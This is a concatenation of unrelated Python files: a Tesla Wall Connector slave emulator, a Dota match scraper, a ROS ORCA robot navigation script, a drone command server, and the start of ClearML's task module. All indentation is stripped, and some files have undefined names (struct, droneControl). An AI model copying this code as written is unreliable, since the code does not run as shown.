if(msgMatch and foundMsgMatch == False):
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready2. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
else:
msgMatch = re.search(b'\A\xfb\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
masterTWCID = senderID
try:
slaveTWC = slaveTWCs[receiverID]
except KeyError:
slaveTWC = new_slave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if(receiverID != fakeTWCID):
# This message was intended for another slave.
# Ignore it.
if(debugLevel >= 11):
print(time_now() + ": Master %02X%02X sent " \
"heartbeat message %s to receiver %02X%02X " \
"that isn't our fake slave." % \
(senderID[0], senderID[1],
hex_str(heartbeatData),
receiverID[0], receiverID[1]))
continue
amps = (slaveHeartbeatData[1] << 8) + slaveHeartbeatData[2]
kWhDelivered += (((240 * (amps/100)) / 1000 / 60 / 60) * (now - timeLastkWhDelivered))
timeLastkWhDelivered = now
if(time.time() - timeLastkWhSaved >= 300.0):
timeLastkWhSaved = now
if(debugLevel >= 9):
print(time_now() + ": Fake slave has delivered %.3fkWh" % \
(kWhDelivered))
save_settings()
if(heartbeatData[0] == 0x07):
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x06):
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
slaveHeartbeatData[1] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[2] = (amps & 0xFF)
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x05 or heartbeatData[0] == 0x08 or heartbeatData[0] == 0x09):
if(((heartbeatData[1] << 8) + heartbeatData[2]) > 0):
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
slaveHeartbeatData[1] = heartbeatData[1]
slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
slaveHeartbeatData[3] = ((ampsUsed >> 8) & 0xFF)
slaveHeartbeatData[4] = (ampsUsed & 0xFF)
elif(heartbeatData[0] == 0):
if(timeTo0Aafter06 > 0 and timeTo0Aafter06 < now):
timeTo0Aafter06 = 0
slaveHeartbeatData[0] = 0x0A
elif(timeToRaise2A > 0 and timeToRaise2A < now):
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
slaveHeartbeatData[0] = 0x0A
elif(heartbeatData[0] == 0x02):
print(time_now() + ": Master heartbeat contains error %ld: %s" % \
(heartbeatData[1], hex_str(heartbeatData)))
else:
print(time_now() + ": UNKNOWN MHB state %s" % \
(hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(slaveHeartbeatData)
else:
msgMatch = re.search(b'\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
if(debugLevel >= 1):
print(time_now() + ": Received 2-hour idle message from Master.")
else:
msgMatch = re.search(b'\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
new_slave(senderID, maxAmps)
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = new_slave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(b'\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage request message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 8):
print(time_now() + ": VRQ from %02X%02X to %02X%02X" % \
(senderID[0], senderID[1], receiverID[0], receiverID[1]))
if(receiverID == fakeTWCID):
kWhCounter = int(kWhDelivered)
kWhPacked = bytearray([((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF)])
print(time_now() + ": VRS %02X%02X: %dkWh (%s) %dV %dV %dV" % \
(fakeTWCID[0], fakeTWCID[1],
kWhCounter, hex_str(kWhPacked), 240, 0, 0))
send_msg(bytearray(b'\xFD\xEB') + fakeTWCID
+ kWhPacked
+ bytearray(b'\x00\xF0\x00\x00\x00\x00\x00'))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(.........+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage response message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 1):
print(time_now() + ": VRS %02X%02X: %dkWh %dV %dV %dV" % \
(senderID[0], senderID[1],
kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC))
if(foundMsgMatch == False):
print(time_now() + ": ***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
print("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
backgroundTasksQueue.join()
ser.close()
#
# End main program
#
##############################
|
match_details.py
|
"""This module pulls matches from the matches table and gets detailed information on them and saves it in the database.
TODO:
Fix the sql schema, season isn't included.
And also store all the data about the player such as item, level, abilities whatever etc.
"""
import urllib.request
import urllib.parse
import json
import time
import database
from info import *
from connection import fetch
import threading
from CollectionCounter import CollectionCounter
from collections import namedtuple
class MatchIDRetriever:
"""Thread-safe class to retrieve unchecked player account_ids from the database.
"""
lock = threading.Lock()
def get_ids(self, n: int) -> int: # Does this generator need to be here? I think just get() will suffice, although idk.
"""Generator to yield an unchecked match_id.
Args:
n: How many matches to yield.
Yields:
Yields an unchecked match.
"""
i = 0
while i < n:
yield self.get_match()
i += 1
def get_match(self) -> int:
"""Get an unchecked match.
Returns:
Returns an a match id that hasn't been checked and checks it.
"""
with self.lock:
conn, cur = database.get()
cur.execute('SELECT match_id from matches WHERE checked = 0 LIMIT 1')
id_ = None
for x in cur:
id_ = x[0]
cur.execute('UPDATE matches SET checked=1 WHERE match_id=?', (id_,))
conn.commit()
conn.close()
return id_
class Table:
def __init__(self, name: str, fields: tuple):
self.name = name
self.fields = fields
def construct_insert(self):
return "INSERT OR IGNORE INTO {0} VALUES ({1})".format(self.name, ("?,"*len(self.fields))[:-1])
def save_to_disk_matches_detailed(data : dict, cur):
# I use it 'cause it's fancy and I want to remember namedtuples in the future :) This is a gross misuse though.
fields = namedtuple('matches_detailed_fields',
["radiant_win", "duration", "pre_game_duration", "start_time", "match_id", "match_seq_num",
"tower_status_radiant", "tower_status_dire", "cluster", "first_blood_time", "lobby_type",
"human_players",
"leagueid", "positive_votes", "negative_votes", "game_mode", "flags", "engine",
"radiant_score", "dire_score"])
table = Table("matches_detailed", fields._fields)
extracted_data = [data["result"][k] for k in fields._fields]
try:
cur.execute(table.construct_insert(),
extracted_data)
except KeyError:
pass
def save_to_disk_player_match_detailed(data : dict, cur):
fields = namedtuple('player_match_detailed_fields',
["account_id", "player_slot", "hero_id", "item_0", "item_1", "item_2", "item_3",
"item_4", "item_5", "kills", "deaths", "assists", "leaver_status", "gold", "last_hits", "denies",
"gold_per_min", "xp_per_min", "gold_spent", "hero_damage", "tower_damage", "hero_healing",
"level", "match_id"])
field_positions = dict(zip(fields._fields, range(len(fields._fields))))
table = Table("player_match_detailed", fields._fields)
for player in data["result"]["players"]:
extracted_data = list(map(player.get, fields._fields))
extracted_data = [x if x else -1 for x in extracted_data]
extracted_data[field_positions["match_id"]] = data["result"]["match_id"] # Set match_id
try:
cur.execute(
table.construct_insert(),
extracted_data)
except KeyError:
pass
def save_to_disk_ability_upgrade(data : dict, cur):
fields = namedtuple('ability_upgrade_fields',
["ability", "time", "level", "account_id", "match_id"])
field_positions = dict(zip(fields._fields, range(len(fields._fields))))
table = Table("ability_upgrade", fields._fields)
for player in data["result"]["players"]:
if "ability_upgrades" not in player:
continue
for ability_upgrade in player["ability_upgrades"]:
extracted_data = list(map(ability_upgrade.get, fields._fields))
if "account_id" in player:
extracted_data[field_positions["account_id"]] = player["account_id"]
else:
extracted_data[field_positions["account_id"]] = -1
extracted_data[field_positions["match_id"]] = data["result"]["match_id"]
cur.execute(
table.construct_insert(),
extracted_data)
def save_to_disk(data: dict):
conn, cur = database.get()
save_to_disk_matches_detailed(data, cur)
save_to_disk_player_match_detailed(data, cur)
save_to_disk_ability_upgrade(data, cur)
conn.commit()
conn.close()
def collect(api_key: int, match_details_counter: CollectionCounter = None):
match_retriever = MatchIDRetriever()
try:
for id_ in match_retriever.get_ids(100000):
params = urllib.parse.urlencode({'key': api_key, 'match_id': id_})
response = fetch(GET_MATCH_DETAILS_URL, params)
data = json.loads(response)
match_details_counter.increment(1)
save_to_disk(data)
except KeyboardInterrupt:
save_to_disk(data)
def main():
match_details_counter = CollectionCounter()
for i in range(1, 50):
key = get_key()
t = threading.Thread(target=collect, args=(key, match_details_counter), name=key)
t.start()
time.sleep(1 / 6) # So requests are out of sync.
if __name__ == "__main__":
main()
|
A5.py
|
#!/usr/bin/env python
import rvo2
import matplotlib.pyplot as plt
import numpy as np
import random
import rospy
import time
import threading
import math
import sys
from utils import *
from nav_msgs.msg import Odometry
import A5easyGo as easyGo
rospy.init_node('A5_mvs', anonymous=False)
SIMUL_HZ = 10.0
sim = rvo2.PyRVOSimulator(1/SIMUL_HZ, 15.0, 10, 5.0, 2.0, 0.15, 3.0)
COL = 10.0
ROW = 10.0
voxel_size = 0.5
size = voxel_size/2
#ROBOT MOVE
SPEED = 20 # 14
ROTATE_SPEED = 25 # 25
ORCA_THRES = 2
global Target
Target = [1.5, 0.1]
def GoEasy(direc):
if direc == 4: # Backward
easyGo.mvStraight(- SPEED, -1)
elif direc == 0 or direc == 1: # Go straight
easyGo.mvStraight(SPEED, -1)
elif direc == 2: # turn left
easyGo.mvRotate(ROTATE_SPEED, -1, False)
elif direc == 3: # turn right
easyGo.mvRotate(ROTATE_SPEED, -1, True)
elif direc == 5: # stop
easyGo.stop()
#MIN_OBS_SIZE = 0.6 / 2
#MAX_OBS_SIZE = 1.4 / 2
# make random square object
'''
obs_center_size = [(random.uniform(-COL, COL), random.uniform(0, ROW), random.uniform(MIN_OBS_SIZE, MAX_OBS_SIZE)) for i in range(15)]
# osb_position must be convex in counter clock wise order
obs_position_list = [[(x-size, y-size),(x+size, y-size), (x+size, y+size), (x-size, y+size)] for x,y,size in obs_center_size]
obs = [sim.addObstacle(obs_position) for obs_position in obs_position_list]
'''
# single obstacle for test
# obs_position_list = [[(6.1,6.1), (4.1, 6.1), (4.1, 4.1)]]
#o1 = sim.addObstacle([(6.1,6.1), (4.1, 6.1), (4.1, 4.1)])
# obs_position_list = np.array(obs_position_list)
global obs_pos, self_pos, self_yaw
obs_pos = [[0, 0], [0, 0], [0, 0], [0, 0]]
self_pos = [0, 0]
self_yaw = 0.0
def ob1_callback(data):
global self_pos
global obs_pos
global self_yaw
_x = data.pose.pose.position.x
_y = data.pose.pose.position.y
relative_x = _x - self_pos[1]
relative_y = _y - self_pos[0]
x2 = math.cos(1.57-self_yaw) * relative_x - math.sin(1.57-self_yaw) * relative_y
y2 = math.sin(1.57-self_yaw) * relative_x + math.cos(1.57-self_yaw) * relative_y
obs_pos[0] = [x2, y2]
def ob2_callback(data):
global self_pos
global obs_pos
global self_yaw
_x = data.pose.pose.position.x
_y = data.pose.pose.position.y
relative_x = _x - self_pos[1]
relative_y = _y - self_pos[0]
x2 = math.cos(1.57-self_yaw) * relative_x - math.sin(1.57-self_yaw) * relative_y
y2 = math.sin(1.57-self_yaw) * relative_x + math.cos(1.57-self_yaw) * relative_y
obs_pos[1] = [x2, y2]
def ob3_callback(data):
global self_pos
global obs_pos
global self_yaw
_x = data.pose.pose.position.x
_y = data.pose.pose.position.y
relative_x = _x - self_pos[1]
relative_y = _y - self_pos[0]
x2 = math.cos(1.57-self_yaw) * relative_x - math.sin(1.57-self_yaw) * relative_y
y2 = math.sin(1.57-self_yaw) * relative_x + math.cos(1.57-self_yaw) * relative_y
obs_pos[2] = [x2, y2]
def ob4_callback(data):
global self_pos
global obs_pos
global self_yaw
_x = data.pose.pose.position.x
_y = data.pose.pose.position.y
relative_x = _x - self_pos[1]
relative_y = _y - self_pos[0]
x2 = math.cos(1.57-self_yaw) * relative_x - math.sin(1.57-self_yaw) * relative_y
y2 = math.sin(1.57-self_yaw) * relative_x + math.cos(1.57-self_yaw) * relative_y
obs_pos[3] = [x2, y2]
def self_callback(data):
global self_pos, self_yaw
_x = data.pose.pose.position.x
_y = data.pose.pose.position.y
ox = data.pose.pose.orientation.x
oy = data.pose.pose.orientation.y
oz = data.pose.pose.orientation.z
ow = data.pose.pose.orientation.w
self_yaw = qut2eu(ox, oy, oz, ow)
self_pos = [_y, _x]
def listener():
print('listener ready')
rospy.Subscriber("/tb3_4/odom", Odometry, self_callback)
rospy.Subscriber("/tb3_0/odom", Odometry, ob1_callback)
rospy.Subscriber("/tb3_1/odom", Odometry, ob2_callback)
rospy.Subscriber("/tb3_2/odom", Odometry, ob3_callback)
rospy.Subscriber("/tb3_3/odom", Odometry, ob4_callback)
rospy.spin()
def orca(verbose=False):
global obs_pos
global self_pos
global self_yaw
global Target
sim.processObstacles()
agents_position =[(0,0)]
agents = [sim.addAgent(position, 15.0, 10, 5.0, 2.0, 0.15, 3.0, (0.0,3.0)) for position in agents_position]
agents_velocity = [(0.0, 0.5)]
for agent, velocity in zip(agents, agents_velocity):
sim.setAgentPrefVelocity(agent, velocity)
pc2obs_time = 0.0
lpp_time = 0.0
dist = math.sqrt((Target[0] - self_pos[1])**2 + (Target[1] - self_pos[0])**2)
step = 0
while(dist > 0.3):
samples = np.array(obs_pos)
if type(samples) == type(False):
continue
t1 = time.time()
t2 = time.time()
dist = math.sqrt((Target[0] - self_pos[1])**2 + (Target[1] - self_pos[0])**2)
_obs = [[math.sqrt(y**2 + x**2)] for x,y in samples]
min_obs_dist = min(_obs)
min_obs_idx = np.argmin(_obs)
if samples[min_obs_idx][1] <= 0:
min_obs_dist[0] = 100
sim.clearObstacle()
obs_position_list = [[(x-size, y-size),(x+size, y-size), (x+size, y+size), (x-size, y+size)] for x,y in samples]
obs = [sim.addObstacle(obs_position) for obs_position in obs_position_list]
sim.processObstacles()
sim.setAgentPosition(0, (0,0))
positions = [sim.getAgentPosition(agent) for agent in agents]
sim.doStep()
positions = np.array(positions)
obs_position_list = np.array(obs_position_list)
velocity = [sim.getAgentVelocity(agent) for agent in agents]
print(min_obs_dist)
if min_obs_dist[0] > ORCA_THRES:
print('DAP')
dist = math.sqrt((Target[0] - self_pos[1])**2 + (Target[1] - self_pos[0])**2)
current_angle = self_yaw ##rad.
desired_angle = math.atan2(Target[1]-self_pos[0],
Target[0]-self_pos[1])
desired_angle = math.atan2(Target[1]-self_pos[0],
Target[0]-self_pos[1])
rot_angle = self_yaw - desired_angle
if np.abs(rot_angle) > math.pi:
rot_angle = -np.sign(rot_angle) * (2*math.pi - np.abs(rot_angle))
#print(self_yaw, 'for ', desired_angle)
if abs(rot_angle) < 0.2:
direc = 1 # go straight
elif rot_angle >= 0.2:
direc = 3 # turn right
elif rot_angle <= -0.2:
direc = 2 # turn right
else:
print('ORCA')
if velocity[0][0] < 0:
direc = 2 # turn left
elif velocity[0][0] > 0:
direc = 3 # turn right
elif velocity[0][1] > 0:
direc = 1 # go straight
elif velocity[0][1] < 0:
direc = 4 # backward
else:
direc = 5 # stop
GoEasy(direc)
t3 = time.time()
pc2obs_time += t2-t1
lpp_time += t3-t2
# plt.arrow(positions[0][0], positions[0][1], velocity[0][0], velocity[0][1], width=0.05)
# for obs_position in obs_position_list:
# plt.plot(np.hstack([obs_position[:,0],obs_position[0][0]]), np.hstack([obs_position[:,1],obs_position[0][1]]))
# plt.scatter(positions[:,0], positions[:,1], label='agents')
# if len(samples) != 0:
# plt.scatter(samples[:,0], samples[:,1], label='samples')
# plt.legend()
# plt.title("Trajectories of the agnets")
# plt.xlabel("x (m)")
# plt.ylabel("y (m)")
# plt.xlim(-5,5)
# plt.ylim(-2,8)
# plt.pause(0.001)
# plt.cla()
print("{:.6f} sec simulated".format(step/SIMUL_HZ))
time.sleep(0.1)
step += 1
easyGo.stop()
rospy.signal_shutdown("esc")
sys.exit(1)
def load_orca():
print("orca ready")
orca_thread = threading.Thread(target=orca)
orca_thread.start()
if __name__ == "__main__":
try:
load_orca()
listener()
except KeyboardInterrupt:
print("Interrupted by key")
|
krang.py
|
import numpy as np
import threading
import time
import socket
import swarmNet
import os
import math
import senseControl
def krangServer(ip):
print(' - - -- starting the drone center command')
global running
global started
global state
global started
backlog = 1 # how many connections to accept
maxsize = 28
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
binded = False
while not binded:
try:
server.bind((ip,swarmNet.droneCommLeftPort))
binded = True
except:
print('- Give Status -- binding failed')
binded = False
time.sleep(20)
server.listen(1)
while running:
print('--- waiting for a connection')
try:
connection, client_address = server.accept()
print('------ Connection coming from ' + str(client_address))
code = struct.unpack('i',connection.recv(4))[0]
print('------ code : '+ str(code))
if code == swarmNet.requestStatusCode:
data = struct.pack('ii', swarmNet.sendStatusCode,state)
try:
connection.sendall(data)
except:
print('sending did not work :/ but better not break everything')
if code == swarmNet.startCode[0]:
data = struct.pack('i', code+1)
try:
connection.sendall(data)
except:
print('sending did not work :/ but better not break everything')
droneControl.TakeOff()
started = True
state =2
try:
connection.sendall(data)
except:
print('sending did not work :/ but better not break everything')
except ValueError:
print(ValueError)
running = True
def main():
global running
senseController = senseControl.senseController()
t0 = time.time()
ti=t0
#displayStart()
statusThread = threading.Thread(target = swarmNet.giveStatus, args=(swarmNet.krangIP,))
statusThread.daemon = True
statusThread.start()
statusThread = threading.Thread(target = krangServer, args=(swarmNet.krangIP,))
statusThread.daemon = True
statusThread.start()
while running:
time.sleep(60)
print('---- waiting for your drones')
if __name__ == '__main__':
main()
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
import warnings
from copy import copy
from datetime import datetime
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, deferred_config, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR, DOCKER_BASH_SETUP_ENV_VAR
from ...utilities.process.mp import SingletonLock
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_ignore_requirements = set()
_store_diff = deferred_config('development.store_uncommitted_code_diff', False)
_store_remote_diff = deferred_config('development.store_code_diff_from_remote', False)
_report_subprocess_enabled = deferred_config('development.report_use_subprocess', sys.platform == 'linux')
_force_use_pip_freeze = deferred_config(multi=[('development.detect_with_pip_freeze', False),
('development.detect_with_conda_freeze', False)])
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, minimum length of 3 characters, used only if a new task is created.
The new task will be associated with a project by this name. If no such project exists, a new project will
be created using the API.
:type project_name: str
:param task_name: Optional task name, minimum length of 3 characters, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
SingletonLock.instantiate()
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False,
check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git is too large to store on the task, we must store it as artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if self._force_use_pip_freeze:
if isinstance(self._force_use_pip_freeze, (str, Path)):
conda_requirements = ''
req_file = Path(self._force_use_pip_freeze)
